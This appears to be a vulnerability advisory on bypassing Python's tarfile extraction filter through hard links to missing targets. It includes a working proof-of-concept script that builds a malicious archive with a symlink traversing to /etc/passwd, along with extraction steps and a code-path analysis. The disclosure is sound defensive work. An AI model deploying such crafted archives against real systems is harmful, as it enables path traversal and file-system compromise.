Summary
Python's TarFile.extractall() and TarFile.extract() methods accept an extraction filter that is intended to make these methods safer to use.
A bug in how links are processed allows the filter to be bypassed in some limited cases, so that objects can be created under directories other than their intended location.
The bypass is triggered when a hard link is being created that points to a file that does not exist. The existence of a file can be manipulated by changing a symlink during extraction.
The bypass does not apply to the hard link path validation, but does affect other validation that may occur - such as excluding file types, changing modes, etc.
Severity
Moderate - Should be fixed, but not serious in nature.
1. Create the tar file
Run the following Python code to create a tar file that demonstrates the vulnerability. When extracted, this tar file creates a symlink that bypasses the filter's check on symlink destinations.
import tarfile
with tarfile.open("poc-hardlink-bypass.tar", mode="x:") as tar:
    # Create a deep directory structure so the c/escape symlink stays inside the path
    a = tarfile.TarInfo("a/t/t/t/t/t/t/t/t/t/t/dummy")
    a.size = 0
    a.type = tarfile.REGTYPE
    tar.addfile(a)
    # Create a dummy file that creates the b directory (I am lazy)
    b = tarfile.TarInfo("b/dummy")
    b.size = 0
    b.type = tarfile.REGTYPE
    tar.addfile(b)
    # Point "c" to the bottom of the tree in "a"
    ca = tarfile.TarInfo("c")
    ca.type = tarfile.SYMTYPE
    ca.linkname = "a/t/t/t/t/t/t/t/t/t/t"
    tar.addfile(ca)
    # Create a symlink. At this point the link should point to a non-existent location under "a"
    cescape = tarfile.TarInfo("c/escape")
    cescape.type = tarfile.SYMTYPE
    cescape.linkname = "../../../../../../../../etc/passwd"
    tar.addfile(cescape)
    # Move "c" to point to "b". This means "c/escape" no longer exists.
    cb = tarfile.TarInfo("c")
    cb.type = tarfile.SYMTYPE
    cb.linkname = "b"
    tar.addfile(cb)
    # Attempt to create a hard link to "c/escape". Since it doesn't exist it
    # will basically create "cescape" but at "boom". Which means the directory
    # traversal now escapes the destination path.
    boom = tarfile.TarInfo("boom")
    boom.type = tarfile.LNKTYPE
    boom.linkname = "c/escape"
    tar.addfile(boom)
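Before extracting, it can help to confirm that the members were stored in the intended order. The following is a minimal sketch using only the public tarfile API; describe_members() and build_sample() are hypothetical helper names introduced here for illustration, and the small in-memory archive exists only so the helper can be tried in isolation.

```python
import io
import tarfile


def describe_members(tar):
    """Return (name, kind, linkname) for every member, in archive order."""
    rows = []
    for member in tar.getmembers():
        if member.issym():
            kind = "symlink"
        elif member.islnk():
            kind = "hardlink"
        elif member.isdir():
            kind = "dir"
        elif member.isreg():
            kind = "file"
        else:
            kind = "other"
        rows.append((member.name, kind, member.linkname))
    return rows


def build_sample():
    """Build a tiny in-memory archive (hypothetical sample data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        # A TarInfo defaults to an empty regular file.
        tar.addfile(tarfile.TarInfo("b/dummy"))
        link = tarfile.TarInfo("c")
        link.type = tarfile.SYMTYPE
        link.linkname = "b"
        tar.addfile(link)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    with tarfile.open(fileobj=build_sample(), mode="r") as tar:
        for row in describe_members(tar):
            print(row)
```

To inspect the proof-of-concept archive instead, open it with tarfile.open("poc-hardlink-bypass.tar", mode="r") and pass the resulting object to describe_members().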
2. Extract the tar file
Change into a new directory (e.g. mkdir poc; cd poc) and run the following in Python to extract the tar file created above.
import tarfile
tarfile.open("../poc-hardlink-bypass.tar", mode="r").extractall(".", filter="data")
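To see what the extraction left behind, the entries can be inspected without following symlinks. This is a small sketch, not part of the original report; describe_path() is a hypothetical helper name. Going by the comments in the archive script, an affected interpreter would be expected to leave "boom" as a symlink carrying the linkname of "c/escape", while a fixed interpreter may behave differently (for example by raising an error during extraction).

```python
import os
import stat


def describe_path(path):
    """Report what exists at path without following symlinks."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return ("missing", None)
    if stat.S_ISLNK(st.st_mode):
        # For symlinks, also return the raw link target.
        return ("symlink", os.readlink(path))
    if stat.S_ISDIR(st.st_mode):
        return ("dir", None)
    if stat.S_ISREG(st.st_mode):
        return ("file", None)
    return ("other", None)


if __name__ == "__main__":
    # Run from inside the extraction directory (e.g. poc).
    for name in ("a", "b", "c", "boom"):
        print(name, describe_path(name))
```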
Further Analysis
When a hard link is extracted from a tar archive using extractall() or extract(), the function TarFile.makelink() is called.
Before calling os.link() to create the hard link, it checks whether the link target exists by calling os.path.exists().
If the link target does not exist, rather than creating the link target and then creating the hard link to the link target, the link target is fetched using TarFile._find_link_target() and extracted directly using TarFile._extract_member() at the location where the hard link would have been created.
This call to TarFile._extract_member() does not pass through the filter method.
This means that by carefully crafting the link target member in the tar file, an attacker can bypass security controls.
Reaching TarFile._find_link_target() with a hard link is challenging. The search for the link target is restricted to the members that appear before the hard link in the tar file. This means that if extractall() is being used, the link target member must itself be successfully extractable. This is not required if extract() is used.
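The "members before the hard link" restriction can be approximated with the public API. The sketch below is an illustration rather than the library's implementation: find_earlier_member() and build_sample() are hypothetical names, names are compared exactly (no path normalization), and preferring the most recent earlier match is an assumption of this sketch.

```python
import io
import tarfile


def find_earlier_member(tar, hardlink):
    """Return the closest member stored before hardlink whose name equals its linkname."""
    earlier = []
    for member in tar.getmembers():
        if member is hardlink:
            break
        earlier.append(member)
    # Walk backwards so the most recent earlier match is returned.
    for candidate in reversed(earlier):
        if candidate.name == hardlink.linkname:
            return candidate
    return None


def build_sample():
    """Archive with a target before the hard link and a same-named member after it."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        sym = tarfile.TarInfo("c/escape")
        sym.type = tarfile.SYMTYPE
        sym.linkname = "target"
        tar.addfile(sym)
        link = tarfile.TarInfo("boom")
        link.type = tarfile.LNKTYPE
        link.linkname = "c/escape"
        tar.addfile(link)
        # Same name again, but stored after the hard link, so it is ignored.
        tar.addfile(tarfile.TarInfo("c/escape"))
    buf.seek(0)
    return buf


if __name__ == "__main__":
    with tarfile.open(fileobj=build_sample(), mode="r") as tar:
        members = tar.getmembers()
        found = find_earlier_member(tar, members[1])
        print(found.name, found.issym())
```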
This technique cannot be used to create a hard link outside of the destination path. Hard links depend on TarInfo._link_target being present. However, this attribute is only set in TarFile._get_extract_tarinfo(), which is not called on this code path.
Timeline
Date reported: 2025-05-02
Date fixed:
Date disclosed: 2025-07-31